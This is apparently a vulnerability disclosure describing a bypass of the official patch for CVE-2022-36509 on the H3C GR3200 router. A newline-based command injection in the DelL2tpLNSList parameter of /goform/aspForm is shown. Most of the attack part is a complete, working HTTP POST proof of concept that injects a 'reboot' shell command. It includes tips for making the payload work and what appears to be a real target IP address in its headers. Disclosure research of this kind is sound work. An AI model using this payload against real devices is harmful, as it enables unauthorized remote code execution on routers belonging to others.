This is a method to bypass the offical patch for CVE-2022-36509

Vulnerability introduction

H3C GR3200 was discovered a fatal vulnerabilities that can cause a remote code execution(RCE) via the aspForm parame

Official website : https://www.h3c.com/

Download link: H3C MiniGR1B0V100R016 版本软件及说明书-新华三集团-H3C

H3C MiniGR1B0V100R016 is the latest version on GR3200

Vulnerability analysis

DelL2tpLNSList parameter in the function sub_10069280

In the binary file /bin/webs , we use IDA to locate the function sub_10069280 that causes the vulnerability.

As you can see, the snprintf function is called on line 36 of the sub_10069280 function. Let’s trace the source of the parameter

We found that the value of v6 and v7 is determined by parameter , we can bypass the check_function sub_100695B4(CVE-2022-36509 offical patch) by using the character ‘0a’ like this

The image shows the router rebooting after the reboot command is executed

The POC is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /goform/aspForm HTTP/1.1
Host: 
Cookie: JSESSIONID=16662132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://180.106.158.162:10250
Referer: https://180.106.158.162:10250/vpn_l2tp_session.asp
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
Te: trailers
Connection: close

CMD=DelL2tpLNSList&param=1; 
reboot;

Note that when copying this POC, there will be an additional 0d byte after ‘param=1;’, and all you need to do is delete this byte